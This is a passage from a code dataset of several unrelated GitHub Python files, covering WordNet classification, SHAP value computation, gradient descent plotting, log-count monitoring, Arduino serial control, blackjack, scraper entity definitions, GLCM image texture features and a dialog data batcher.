all synonyms for a word in natural language using wordnet.\ndef synonyms(word) :\n \"\"\"Returns lowercase string without articles \n >>> print(synonym(\"eatery\"))\n restaurant\n \"\"\"\n synsets = wn.synsets(word) \n syns = set()\n for synset in synsets : # different meanings of a word e.g. 'bank'\n for syn in synset.lemma_names() : # names for each different meaning\n syns.add(syn.title()) # add all synonym names to the result set\n \n return syns\n\n# Classifies a name string like \"Restaurants\", i.e. 
it uses word net and returns the class IRI for the entity.\ndef classify(entity_name) :\n\n class_name = get_class_name(entity_name)\n \n # If there is no class for the name, use wordnet and look for classes synonyms\n if (len(class_name) == 0) :\n # use wordnet and try again\n wn_words = synonyms(entity_name)\n for word in wn_words :\n class_name = get_class_name(word)\n # first match is used\n if (len(class_name) > 0) :\n break\n \n # If the string has several tokens like 'ice cream shop' try again with parts 'ice cream' and 'cream shop'\n words = entity_name.split()\n if (len(class_name) == 0 and len(words) > 1) :\n try :\n class_name = classify(' '.join(words[:-1]))[1:-1] # <> have to be removed\n except RuntimeError :\n class_name = \"\"\n \n if (class_name == \"\") :\n try :\n class_name = classify(' '.join(words[1:]))[1:-1] # <> have to be removed\n except RuntimeError :\n class_name = \"\"\n \n \n # In case that wordnet could not discover any classes throw error\n if (len(class_name) == 0) :\n raise RuntimeError(\"No class found for '\" + entity_name + \"'\")\n \n return \"<\" + class_name + \">\"\n","repo_name":"lfuhr/geoQAS","sub_path":"classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41653277406","text":"import shap\n\nfrom shap_library_utils.explainers._conditionalshap import ConditionalShap\nfrom shap_library_utils.explainers._manifoldshap import ManifoldShap\nfrom utilities.models import MLPWrapper\n\n\nclass ShapExplainerWrapper:\n \"\"\"\n Provides a wrapper around Shap library,\n to easily use the library to calculate shapley values\n \"\"\"\n def __init__(self, model, data, manifold=None, algorithm='sampling'):\n self.model = model\n self.data = data\n self.manifold = manifold\n self.algorithm = algorithm\n\n def calculate_shapley_values(self, datapoints, **kwargs):\n if self.algorithm == \"kernel\":\n explainer = shap.KernelExplainer(model=MLPWrapper(self.model), data=self.data.numpy())\n shap_values = explainer.shap_values(datapoints.numpy())\n elif self.algorithm == \"sampling\":\n explainer = shap.SamplingExplainer(model=MLPWrapper(self.model), data=self.data.numpy())\n shap_values = explainer(datapoints.numpy(), nsamples=3000).values\n elif self.algorithm == \"manifold\":\n if self.manifold is None:\n raise ValueError(\"Input manifold to calculate ManifoldShap\")\n explainer = ManifoldShap(model=MLPWrapper(self.model), data=self.data.numpy(), manifold=self.manifold)\n shap_values = explainer(datapoints.numpy(), nsamples=2000).values\n elif self.algorithm == \"conditional\":\n explainer = ConditionalShap(model=MLPWrapper(self.model), data=self.data.numpy(), **kwargs)\n shap_values = explainer.shap_values(datapoints.numpy())\n else:\n raise ValueError(\"Invalid algorithm name. 
Must be one of ['sampling', 'kernel', 'manifold', 'conditional'].\")\n return shap_values[:, [0]], shap_values[:, [1]]\n","repo_name":"amazon-science/manifold-restricted-shapley","sub_path":"OODShapley/shap_library_utils/shap_wrapper.py","file_name":"shap_wrapper.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"4235646229","text":"import numpy as np\nfrom func2D_incognito_NEW import func2D_incognito as funcao\nfrom func2D_incognito_NEW import grad_func2D_incognito as grad_funcao\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import axes3d\n\n#Funcao descida de gradiente para duas variaveis\ndef gradiente_descida(inicio, f, grad_funcao):\n# Precisao da solucao\n precisao = 0.001\n\n# Baixa taxa de aprendizado\n taxa_aprendizado = 0.01\n\n # limite de interacoes\n max_inter = 10000\n x_novo = inicio\n res = []\n for i in range(max_inter):\n x_velho = x_novo\n\n x_novo = x_velho - taxa_aprendizado * grad_funcao(x_velho)\n f_x_novo = funcao(x_novo)\n f_x_velho = funcao(x_velho)\n res.append([x_novo, f_x_novo])\n\n print(f_x_novo - f_x_velho)\n#Valors de minimos locais\n if(abs (f_x_novo - f_x_velho) < precisao):\n print(\"Precisao alcancada: %f \" % (f_x_novo - f_x_velho))\n return np.array(res)\n print(\"Iteracao maxima alcancada\")\n return np.array(res)\n\n#intervalo para amostragem\ninicio_intervalo = [-3,-3]\nfim_intervalo = [3,3]\npasso = 0.1\n \nlista1 = []\nlista2 = []\nlista3 = []\n\n#valores para calculo da funcao\nfor var1, var2 in zip(np.arange(inicio_intervalo[0], fim_intervalo[0], passo), np.arange(inicio_intervalo[1], fim_intervalo[1], passo)):\n\n inicio = [var1, var2]\n retorno = gradiente_descida(inicio, funcao, grad_funcao)\n print(\"Minimo local em: \")\n print(retorno[-1][0])\n lista1.append(var1)\n lista2.append(var2)\n \nvar1 = np.array(lista1)\nvar2 = np.array(lista2) \n\n#Geracao do grafico com o comportamento da funcao no intervalo considerado\n\neixo_X, eixo_Y = np.meshgrid(var1, var2)\n\neixo_X_flatten = eixo_X.reshape(-1)\neixo_Y_flatten = eixo_Y.reshape(-1)\n\nvalores_funcao = np.array([funcao([i, j]) for i, j in zip(eixo_X_flatten, eixo_Y_flatten)])\nvalores_funcao_shape = valores_funcao.reshape(eixo_X.shape)\n\neixo_Z = valores_funcao_shape\ngraph = plt.axes(projection='3d')\ngraph.set_xlabel('x Values')\ngraph.set_ylabel('y Values')\ngraph.set_zlabel('z(x,y) values')\ngraph.plot_surface(eixo_X, eixo_Y, eixo_Z, color='green')\nplt.show()\n","repo_name":"AntonioLoca/Redes-Neurais","sub_path":"func2D_incognito_call_ALT.py","file_name":"func2D_incognito_call_ALT.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"123120429","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\nimport os\nimport re\n\nkeys = [ 'yadrop.auth.blackbox.ok',\n'yadrop.auth.blackbox.error',\n'yadrop.auth.cache'\n]\n\nitems = dict()\n\nfor key in keys:\n\titems[key] = 0\n\nfin = os.popen('/usr/bin/mymtail.sh /var/log/yadrop/auth.log yadrop', 'r')\n\nindex1 = re.compile('ya_blackbox:\\d+:info .* type=blackbox code=200')\nindex2 = re.compile('ya_blackbox:\\d+:error .* type=blackbox')\nindex3 = re.compile('yadrop_auth:\\d+:info .* type=auth_cache')\n\nfor line in fin:\n\tmatches = index1.findall(line)\n\tif len(matches):\n\t\titems['yadrop.auth.blackbox.ok'] += 1\n\n\tmatches = index2.findall(line)\n\tif len(matches):\n\t\titems['yadrop.auth.blackbox.error'] += 
1\n\n\tmatches = index3.findall(line)\n\tif len(matches):\n\t\titems['yadrop.auth.cache'] += 1\n\nfor key, value in items.items():\n print(\"%s %s\" % (key, value))\n\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"disk/disk-testing/roots/units/yadrop/files/usr/lib/yandex-graphite-checks/available/yadrop-auth.py","file_name":"yadrop-auth.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5887828183","text":"from Paquet import piocheCarte, valeurCarte\r\nimport continues\r\n\r\ndef tourJoueur(j,paquet, dicoScores, listeJoueur):\r\n score=dicoScores[j]\r\n\r\n print(\"** tour .\",1,\" \"*6,\"Joueur :\",j,\" \"*6,\"main actuelle :\", score,\"**\")\r\n print(\"\")\r\n\r\n condition=continues()\r\n\r\n if condition==True:\r\n carte=piocheCarte(paquet,1)\r\n nb=valeurCarte(carte[0],j)\r\n score=nb+score\r\n\r\n if score==21:\r\n print(\"\")\r\n return score\r\n\r\n elif score>21:\r\n listeJoueur.remove(j)\r\n print(\"perdant\",listeJoueur)\r\n print (\"Vous avez dépassé 21 vous avez perdu\")\r\n print(\"\")\r\n return score\r\n\r\n\r\n else:\r\n print (\"Votre nouvelle main est :\",score)\r\n print(\"\")\r\n return score\r\n\r\n else:\r\n print(\"coucher\",listeJoueur)\r\n listeJoueur.remove(j)\r\n print (\"Vous avez décidé de vous coucher\")\r\n print(\"\")\r\n return score\r\n","repo_name":"CryStretch/BlackJack","sub_path":"TourJoueur/tourJoueur.py","file_name":"tourJoueur.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"71859853673","text":"'''\n@Descripttion: \n@version: \n@Author: Bennett\n@Date: 2020-04-22 08:42:47\n@LastEditTime: 2020-04-24 10:37:18\n'''\n#!/usr/bin/env python3\n# coding=utf-8\n# author=XingLong Pan\n# date=2016-12-05\n\n# 你可以理解为scrapy框架中的item\nmovie = {\n # 电影id\n 'douban_id': '',\n # 电影名字\n 'title': '',\n # 导演\n 'directors': '',\n # 编剧\n 'scriptwriters': '',\n # 演员\n 'actors': '',\n #\n 'types': '',\n 'release_region': '',\n 'release_date': '',\n 'alias': '',\n 'languages': '',\n 'duration': '',\n 'score': 0.0,\n 'description': '',\n 'tags': '',\n 'recommendMovie': '',\n 'vote_num': '',\n 'rating_per_stars5': '',\n 'rating_per_stars4': '',\n 'rating_per_stars3': '',\n 'rating_per_stars2': '',\n 'rating_per_stars1': '',\n 'comment_num': ''\n\n}\n\nmovieComment = {\n \"douban_id\": '',\n \"comment_url\": '',\n \"star\": '',\n \"content\": '',\n \"comment_id\": '',\n \"people_id\": '',\n \"people\": '',\n \"useful_num\": '',\n \"time\": '',\n \"people_url\": '',\n}\n\npersonalInfo = {\n \"pid\": '',\n \"name\": '',\n \"location\": '',\n \"introduction\": '',\n \"follow_num\": '', # 关注人的数量,但其中包含了一些已经注销了账号的,注销账号的不爬取\n \"personUrl\": '',\n \"register_time\": '',\n \"follow_url\": '',\n \"do\":'',\n \"wish\":'',\n \"collect\":'',\n \"do_num\":'',\n \"wish_num\":'',\n \"collect_num\":''\n}\n\nfollowPersonUrl = {\n \"originalId\": '', # 源豆瓣人的名字\n \"followId\": '', # 关注人的id(唯一)\n \"followUrl\": '' # 关注人主页的url\n}\n\nwishMovie = {\n \"douban_id\": '', # 源豆瓣人的名字\n \"people_id\": '', # 关注人的id(唯一)\n \"time\": '' # 关注人主页的url\n}\n\n","repo_name":"Bennettsong/douban_spider","sub_path":"page_parser/Entity.py","file_name":"Entity.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9050695211","text":"\"\"\"\r\nSend message from arduino and print it on a computer 
using only python on the computer\r\n\"\"\"\r\n\r\nimport serial\r\n\r\nif __name__ == \"__main__\":\r\n Serial = serial.Serial('com3', 9600)\r\n print(Serial.readline())\r\n print(\"Enter 1 to ON LED and 0 to OFF LED : \")\r\n\r\n while 1:\r\n input_data = input()\r\n\r\n if input_data == '1':\r\n Serial.write(str.encode('1'))\r\n print(\"LED ON\")\r\n\r\n if input_data == '0':\r\n Serial.write(str.encode('0'))\r\n print(\"LED OFF\")\r\n","repo_name":"im-Rajat/Learning-Python","sub_path":"Practice-Python/Assignment2/Q1_2.py","file_name":"Q1_2.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12281110829","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jun 15 23:07:25 2020\r\n\r\n@author: mann\r\n\"\"\"\r\nfrom skimage import io, color\r\nimport os\r\nimport matplotlib.pyplot as plt\r\nimport PIL.Image as Image\r\nimport numpy as np\r\nimport cv2\r\nfrom scipy.stats import skew\r\nfrom sklearn.feature_selection import RFE\r\nfrom sklearn.svm import SVR\r\n\r\npath_in ='datos_entrenamiento'\r\npath_out ='datos_procesados_lab_3'\r\nlistaImagenesEntrada = os.listdir(path_in)\r\n\r\n\r\n\r\ncaracteristicasDeEntrada=[]\r\n\r\ndef genera_caracteristicas():\r\n angulos_reglas = [0,45,90,-45]\r\n codif = ['1_','2_','3_','4_','5_','6_','7_','8_','9_','10_','11_','12_','13_','14_','15_','16_']\r\n parametros = ['homogeneidad','glcmMedia','varianza','entropia','correlacion']\r\n\r\n for angulo in angulos_reglas:\r\n for parametro in parametros:\r\n caracteristicasDeEntrada.append(parametro+str(angulo))\r\n colores = ['CanalA','CanalB']\r\n for color in colores : \r\n for cod in codif:\r\n caracteristicasDeEntrada.append(cod + color)\r\n return caracteristicasDeEntrada\r\n \r\n\r\ndef criba_coeficientes(coeficientes,etiquetas):\r\n if(len(etiquetas)==len(coeficientes)):\r\n# np.amax(coeficientes,resul) \r\n coefiOrdenados = np.argsort(coeficientes)\r\n listaCoeficientes2 = coefiOrdenados[0:5]\r\n listaCoeficientes1 = coefiOrdenados[-5:]\r\n \r\n print(listaCoeficientes1,listaCoeficientes2)\r\n print(\"Parametros mas relevantes: \")\r\n for i in range(5):\r\n print(etiquetas[listaCoeficientes1[i]],\" \",coeficientes[listaCoeficientes1[i]])\r\n print(\"Parametros menos relevantes: \")\r\n for i in range(5):\r\n print(etiquetas[listaCoeficientes2[i]],\" \",coeficientes[listaCoeficientes2[i]]) \r\n else:\r\n \r\n print(\"Error, etiquetas y caracteristicas de tamaños diferentes\")\r\n \r\n# criba_coeficientes(coef,caracteristicasDeEntrada) \r\n\r\ndef criba_coeficientes_RFE(X_Train,Y_Train,etiquetas):\r\n estimator = SVR(kernel=\"linear\")\r\n selector = RFE(estimator, n_features_to_select=10,step=1)\r\n selector = selector.fit(X_Train,Y_Train)\r\n selector.support_\r\n ranking = selector.ranking_\r\n print(\"Caracteristicas mas relevantes\")\r\n for i in range(len(ranking)):\r\n if(ranking[i]==1):\r\n print(etiquetas[i])\r\n \r\n\r\ndef calcula_varias_matrices_coocurrencia2(imagen,valores,media,tamaños_reglas,angulos_reglas):\r\n listaParametros=[]\r\n listaMatrices =[]\r\n #print(\"Comienza el calculo de las matrices de coocurrencia\")\r\n for tama in tamaños_reglas:\r\n for angulo in angulos_reglas:\r\n reglaMatriz = genera_regla(tama,angulo)\r\n # print(valores,imagen,reglaMatriz)\r\n matrizCoocurrencia = calcula_matriz_coocurrencia(valores,imagen,reglaMatriz)\r\n listaMatrices.append(matrizCoocurrencia)\r\n 
listaParametros+=extrae_parametros_matriz_gris(matrizCoocurrencia,media,valores)\r\n return listaParametros,listaMatrices\r\n\r\ndef calcula_varias_matrices_coocurrencia3(imagen,valores,media,tamaños_reglas,angulos_reglas):\r\n listaParametros=[]\r\n lista_matrices = []\r\n \r\n for tama in tamaños_reglas:\r\n for angulo in angulos_reglas:\r\n lista_matrices.append(genera_regla(tama,angulo))\r\n GLCMS = calcula_varias_matrices_GLCM(valores,imagen,lista_matrices)\r\n for glcm in GLCMS:\r\n # print(tamaños_reglas,angulos_reglas)\r\n listaParametros += extrae_parametros_matriz(glcm,media,valores)\r\n print(listaParametros)\r\n return listaParametros\r\n\r\ndef calcula_varias_matrices_coocurrencia4(imagen,valores,tamaños_reglas,angulos_reglas):\r\n listaMatrices =[]\r\n #print(\"Comienza el calculo de las matrices de coocurrencia\")\r\n for tama in tamaños_reglas:\r\n for angulo in angulos_reglas:\r\n reglaMatriz = genera_regla(tama,angulo)\r\n matrizCoocurrencia = calcula_matriz_coocurrencia(valores,imagen,reglaMatriz)\r\n listaMatrices.append(matrizCoocurrencia)\r\n return listaMatrices\r\n\r\ndef extrae_parametros_matriz_gris(matrizCoocurrencia,media,cuantizacion):\r\n\r\n matrizCoocurrenciaProb = probabilidad_matriz_coocurrencia(matrizCoocurrencia,cuantizacion)\r\n hMatriz,wMatriz = matrizCoocurrenciaProb.shape[:2]\r\n \r\n media = np.mean(matrizCoocurrencia)\r\n homogeneidad = 0\r\n # contraste = 0\r\n glcmMedia = 0\r\n varianza = 0\r\n entropia = 0\r\n for i in range(hMatriz):\r\n for j in range(wMatriz):\r\n # print(cuantizacion)\r\n # print(np.power((i-j),2))\r\n homogeneidad += matrizCoocurrenciaProb[i,j]/(1+np.power((i-j),2))\r\n # contraste += matrizCoocurrenciaProb[i,j]*np.power((i-j),2)\r\n glcmMedia += i*matrizCoocurrenciaProb[i,j]\r\n varianza += matrizCoocurrenciaProb[i,j]*np.power((i-media),2)\r\n if(matrizCoocurrenciaProb[i,j]!=0):\r\n entropia += -1*matrizCoocurrenciaProb[i,j]*np.log(matrizCoocurrenciaProb[i,j])\r\n\r\n correlacion = 0\r\n for i in range(hMatriz):\r\n for j in range(wMatriz): \r\n correlacion += matrizCoocurrenciaProb[i,j]*((i-glcmMedia)*(j-glcmMedia)/\r\n (np.sqrt(varianza*varianza)))\r\n listaParametros=[]\r\n# listaParametros.append(\"=================\"+'\\n')\r\n# listaParametros.append(\"Homogeneidad es: \"+str(homogeneidad)+'\\n')\r\n listaParametros.append(homogeneidad)\r\n listaParametros.append(glcmMedia)\r\n listaParametros.append(varianza)\r\n listaParametros.append(entropia)\r\n listaParametros.append(correlacion)\r\n# listaParametros.append(\"Contraste es: \"+str(contraste)+'\\n')\r\n# listaParametros.append(\"GLCM media es: \"+str(glcmMedia)+'\\n')\r\n# listaParametros.append(\"Varianza es: \"+str(varianza)+'\\n')\r\n# listaParametros.append(\"Desviacion tipica es: \"+str(np.sqrt(varianza))+'\\n')\r\n# listaParametros.append(\"Entropia es: \"+str(entropia)+'\\n')\r\n# listaParametros.append(\"Correlacion es: \"+str(correlacion)+'\\n')\r\n# listaParametros.append(\"Media es: \"+str(media))\r\n # print(len(listaParametros)) \r\n return listaParametros\r\n\r\n \r\n \r\ndef extrae_parametros_matriz_color(matrizCoocurrencia,media,centros):\r\n\r\n matrizCoocurrenciaProb = probabilidad_matriz_coocurrencia(matrizCoocurrencia)\r\n # matrizCoocurrenciaProb = matrizCoocurrencia\r\n hMatriz,wMatriz = matrizCoocurrenciaProb.shape[:2]\r\n \r\n \r\n homogeneidad = 0\r\n # contraste = 0\r\n glcmMedia = [0,0,0]\r\n varianza = 0\r\n entropia = 0\r\n for i in range(hMatriz):\r\n for j in range(wMatriz):\r\n # print(cuantizacion)\r\n # 
print(np.power((i-j),2))\r\n homogeneidad += matrizCoocurrenciaProb[i,j]/(1+np.sqrt(np.power((centros[i,0]-centros[j,0]),2)\r\n +np.power((centros[i,1]-centros[j,1]),2)\r\n +np.power((centros[i,2]-centros[j,2]),2)))\r\n # contraste += matrizCoocurrenciaProb[i,j]*np.power((i-j),2)\r\n glcmMedia[0] += matrizCoocurrenciaProb[i,j]*(centros[i,0])\r\n glcmMedia[1] += matrizCoocurrenciaProb[i,j]*(centros[i,1])\r\n glcmMedia[2] += matrizCoocurrenciaProb[i,j]*(centros[i,2])\r\n \r\n \r\n if(matrizCoocurrenciaProb[i,j]!=0):\r\n entropia += -1*matrizCoocurrenciaProb[i,j]*np.log(matrizCoocurrenciaProb[i,j])\r\n\r\n correlacion = 0\r\n for i in range(hMatriz):\r\n for j in range(wMatriz):\r\n varianza += matrizCoocurrenciaProb[i,j]*(np.power((centros[i,0]-glcmMedia[0]),2)\r\n +np.power((centros[i,1]-glcmMedia[1]),2)\r\n +np.power((centros[i,2]-glcmMedia[2]),2))\r\n for i in range(hMatriz):\r\n for j in range(wMatriz): \r\n correlacion += matrizCoocurrenciaProb[i,j]*((np.sqrt(np.power((centros[i,0]-glcmMedia[0]),2)\r\n +np.power((centros[i,1]-glcmMedia[1]),2)\r\n +np.power((centros[i,2]-glcmMedia[2]),2)))\r\n *(np.sqrt(np.power((centros[j,0]-glcmMedia[0]),2)\r\n +np.power((centros[j,1]-glcmMedia[1]),2)\r\n +np.power((centros[j,2]-glcmMedia[2]),2)))/\r\n (np.sqrt(varianza*varianza)))\r\n \r\n \r\n listaParametros=[]\r\n# listaParametros.append(\"=================\"+'\\n')\r\n# listaParametros.append(\"Homogeneidad es: \"+str(homogeneidad)+'\\n')\r\n listaParametros.append(homogeneidad)\r\n listaParametros.append(glcmMedia[0])\r\n listaParametros.append(glcmMedia[1])\r\n listaParametros.append(glcmMedia[2])\r\n listaParametros.append(varianza)\r\n listaParametros.append(entropia)\r\n listaParametros.append(correlacion)\r\n# listaParametros.append(\"Contraste es: \"+str(contraste)+'\\n')\r\n# listaParametros.append(\"GLCM media es: \"+str(glcmMedia)+'\\n')\r\n# listaParametros.append(\"Varianza es: \"+str(varianza)+'\\n')\r\n# listaParametros.append(\"Desviacion tipica es: \"+str(np.sqrt(varianza))+'\\n')\r\n# listaParametros.append(\"Entropia es: \"+str(entropia)+'\\n')\r\n# listaParametros.append(\"Correlacion es: \"+str(correlacion)+'\\n')\r\n# listaParametros.append(\"Media es: \"+str(media))\r\n # print(len(listaParametros)) \r\n return listaParametros\r\n\r\ndef probabilidad_matriz_coocurrencia(matriz):\r\n total=int(sum(sum(matriz)))\r\n# print(total)\r\n matrizCoocurrenciaProbabilidades = matriz/total\r\n# print(matrizCoocurrenciaProbabilidades)\r\n# print(sum(sum(matrizCoocurrenciaProbabilidades)))\r\n return matrizCoocurrenciaProbabilidades\r\n\r\n\r\n\r\n\r\ndef convierte_lab(imagen):\r\n # img = cv2.imread(imagen) \r\n img = cv2.cvtColor(imagen, cv2.COLOR_RGB2BGR)\r\n img = cv2.cvtColor(imagen, cv2.COLOR_BGR2LAB)\r\n return img\r\n\r\ndef kmeans_cluster(fichero,colores):\r\n# img = np.asarray(Image.open(fichero))\r\n img=fichero\r\n Z = img.reshape((-1,1))\r\n# print(Z.shape)\r\n Z = np.float32(Z)\r\n criterios = (cv2.TERM_CRITERIA_EPS, 20000, 0.001)\r\n K = colores\r\n ret,label,centroides=cv2.kmeans(Z,K,None,criterios,10,cv2.KMEANS_RANDOM_CENTERS)\r\n centroides = np.uint8(centroides)\r\n res = centroides[label.flatten()]\r\n res2 = res.reshape((img.shape))\r\n# print(\"Tamaño del conjunto de centroides \",len(centroides))\r\n# print(centroides)\r\n# print(np.unique(centroides))\r\n# print(\"Tamaño del conjunto de etiquetas \",len(label))\r\n# print(label)\r\n# print(\"Valores etiquetas \",np.unique(label))\r\n# return res2\r\n return label.reshape((img.shape))\r\n \r\ndef 
kmeans_cluster_centroides(imagen,colores):\r\n# img = np.asarray(Image.open(fichero))\r\n #img=fichero\r\n #Z = np.vstack(lista)\r\n# print(Z.shape)\r\n #Z = np.reshape(imagen,(-1,3))\r\n Z = imagen.reshape(-1,3)\r\n #print(Z.shape)\r\n Z = np.float32(Z)\r\n criterios = (cv2.TERM_CRITERIA_EPS, 200000, 0.001)\r\n K = colores\r\n ret,label,centroides=cv2.kmeans(Z,K,None,criterios,100,cv2.KMEANS_RANDOM_CENTERS)\r\n centroides = np.uint8(centroides)\r\n res = centroides[label.flatten()]\r\n res2 = res.reshape((imagen.shape))\r\n# print(\"Tamaño del conjunto de centroides \",len(centroides))\r\n# print(centroides)\r\n# print(np.unique(centroides))\r\n# print(\"Tamaño del conjunto de etiquetas \",len(label))\r\n# print(label)\r\n# print(\"Valores etiquetas \",np.unique(label))\r\n# return res2\r\n return centroides \r\n\r\ndef calcula_varias_matrices_GLCM(valores,imagen,matrices):\r\n print(\"Valores en la imagen:\",np.unique(imagen))\r\n hitsCoocurrencia = np.zeros((valores,valores,len(matrices)))\r\n hImagen,wImagen = imagen.shape[:2]\r\n for i in range(hImagen):\r\n for j in range(wImagen):\r\n for k,matriz in enumerate(matrices):\r\n hMatriz,wMatriz = matriz.shape[:2]\r\n if hImagen-int(hMatriz) >=0 and wImagen-int(wMatriz) >=0 \\\r\n and hImagen>=int(i+hMatriz) and wImagen>=int(j+wMatriz):\r\n # print(i,j,hMatriz,wMatriz,i,j)\r\n ventanaImagen = imagen[i:hMatriz+i,j:wMatriz+j]\r\n matrizSobreImagen = matriz*ventanaImagen\r\n valoresCoocurrencia = matrizSobreImagen[np.nonzero(matriz)]\r\n hitsCoocurrencia[int(valoresCoocurrencia[0]),int(valoresCoocurrencia[1]),k]+=int(1)\r\n np.savetxt('coocurrencia1.txt',hitsCoocurrencia[:,:,0],fmt='%i')\r\n return hitsCoocurrencia\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef calcula_matriz_coocurrencia(valores,imagen,matriz):\r\n #valores es la cantidad de colores que podría haber diferentes en este plano de la imagen\r\n hitsCoocurrencia = np.zeros((valores,valores))\r\n vdiferentes = np.unique(imagen)\r\n \r\n# print(hitsCoocurrencia.shape)\r\n hImagen,wImagen = imagen.shape[:2]\r\n hMatriz,wMatriz = matriz.shape[:2]\r\n # print(hImagen,wImagen,hMatriz,wMatriz)\r\n for i in range(hImagen-hMatriz):\r\n for j in range(wImagen-wMatriz):\r\n ventanaImagen = imagen[i:hMatriz+i,j:wMatriz+j]\r\n matrizSobreImagen=matriz*ventanaImagen\r\n valoresCoocurrencia = matrizSobreImagen[np.nonzero(matriz)]\r\n #print(\"valores coocurrencia\",valoresCoocurrencia)\r\n# if(valoresCoocurrencia[0]==0):\r\n# print(valoresCoocurrencia)\r\n # int(valoresCoocurrencia[0])\r\n# print(valoresCoocurrencia)\r\n hitsCoocurrencia[int(np.where(vdiferentes==valoresCoocurrencia[0])[0]),\r\n int(np.where(vdiferentes==valoresCoocurrencia[1])[0])]+=1\r\n # print(hitsCoocurrencia)\r\n return hitsCoocurrencia\r\n\r\ndef genera_regla(tama,angulo):\r\n matriz = np.zeros((tama,tama))\r\n# print(int(np.ceil(tama/2)))\r\n matriz[int(np.ceil(tama/2))-1,int(np.ceil(tama/2))-1]=1\r\n if(angulo==0):\r\n matriz[int(np.ceil(tama/2))-1,tama-1]=1\r\n if(angulo==180):\r\n matriz[int(np.ceil(tama/2))-1,0]=1\r\n if(angulo==-90):\r\n matriz[tama-1,int(np.ceil(tama/2))-1]=1\r\n if(angulo==90):\r\n matriz[0,int(np.ceil(tama/2))-1]=1\r\n if(angulo==45):\r\n matriz[0,tama-1]=1\r\n if(angulo==135):\r\n matriz[0,0]=1\r\n if(angulo==225):\r\n matriz[tama-1,0]=1\r\n if(angulo==-45 or angulo==315):\r\n matriz[tama-1,tama-1]=1\r\n \r\n# print(matriz) \r\n return matriz\r\n\r\ndef datos_imagen_grey(imagen,valores_cuantizacion):\r\n print(\"===================\")\r\n plt.figure\r\n hist,n = 
np.histogram(imagen,range(valores_cuantizacion),[0,valores_cuantizacion-1])\r\n plt.plot(n[1:],hist)\r\n plt.xlim([0,valores_cuantizacion])\r\n indice2=0\r\n for i in n[1:-1]:\r\n# print(hist[i])\r\n if(hist[i]!=0):\r\n b=np.ones(hist[i])*int(i)\r\n# print(b)\r\n if(indice2==0):\r\n indice2=1\r\n a=b\r\n else:\r\n indice2+=1\r\n a=np.concatenate([a,b]) \r\n\r\n media = np.mean(a)\r\n desviacionTipica = np.sqrt(np.var(a))\r\n skewness = skew(a)\r\n\r\n print(\"La media de los valores de intensidad es: \",media)\r\n print(\"La desviación típica es: \",desviacionTipica)\r\n print(\"La asimetría estadística (skewness) es: \",skewness)\r\n \r\n plt.axvline(media,linestyle='dashed',linewidth=2) \r\n print(\"===================\")\r\n plt.show()\r\n \r\ndef datos_imagen(imagen):\r\n color = ('r','g','b')\r\n print(\"===================\")\r\n for i, colo in enumerate(color):\r\n plt.figure\r\n hist,n = np.histogram(imagen[:,:,i],range(256),[0,255])\r\n plt.plot(n[1:],hist,color = colo)\r\n plt.xlim([0,256])\r\n\r\n indice2=0\r\n for i in n[1:-1]:\r\n # print(hist[i])\r\n if(hist[i]!=0):\r\n b=np.ones(hist[i])*int(i)\r\n # print(b)\r\n if(hist[i]!=0):\r\n if(indice2==0):\r\n indice2=1\r\n a=b\r\n else:\r\n indice2+=1\r\n a=np.concatenate([a,b]) \r\n\r\n media = np.mean(a)\r\n desviacionTipica = np.sqrt(np.var(a))\r\n skewness = skew(a)\r\n\r\n print(\"La media del color \",colo,\" es: \",media)\r\n print(\"La desviación típica del color \",colo,\" es: \",desviacionTipica)\r\n print(\"La asimetría estadística (skewness) del color \",colo,\" es: \",skewness)\r\n\r\n plt.axvline(media,linestyle='dashed',color = colo,linewidth=2) \r\n print(\"===================\")\r\n plt.show()\r\n","repo_name":"ManuelL4z0/dermaBCC","sub_path":"processing/other_functions.py","file_name":"other_functions.py","file_ext":"py","file_size_in_byte":16858,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70570883432","text":"import numpy as np\nfrom torch.utils.data import Dataset\n\nfrom source.utils.misc import list2tensor\nfrom source.utils.misc import Pack\n\nbert_max_len = 512\n\nclass DialogDataset(Dataset):\n \"\"\"\n DialogDataset\n \"\"\"\n def __init__(self, data):\n self.data = data\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, idx):\n return self.data[idx]\n\n\nclass DialogBatcher(object):\n\n def __init__(self, batch_size, data_type=\"train\", shuffle=False):\n self.batch_size = batch_size\n self.data_type = data_type\n self.shuffle = shuffle\n\n self.batch_data_list = []\n self.batch_size_list = []\n self.n_batch = None \n self.n_rows = None \n\n def __len__(self):\n return self.n_rows\n\n def prepare_epoch(self):\n if self.shuffle:\n np.random.shuffle(self.batch_data_list)\n\n def get_batch(self, batch_idx):\n local_data = self.batch_data_list[batch_idx]\n batch_data = self.create_batches(local_data)\n return batch_data\n\n def prepare_input_list(self, input_data_list):\n if self.shuffle:\n np.random.shuffle(input_data_list)\n\n self.n_rows = remain_rows = len(input_data_list)\n while remain_rows > 0:\n self.batch_data_list.append({})\n active_size = min(remain_rows, self.batch_size)\n self.batch_size_list.append(active_size)\n remain_rows -= active_size\n self.n_batch = len(self.batch_size_list)\n\n for batch_idx in range(self.n_batch):\n st_idx = batch_idx * self.batch_size\n ed_idx = st_idx + self.batch_size\n # print(f\"st {st_idx}, en 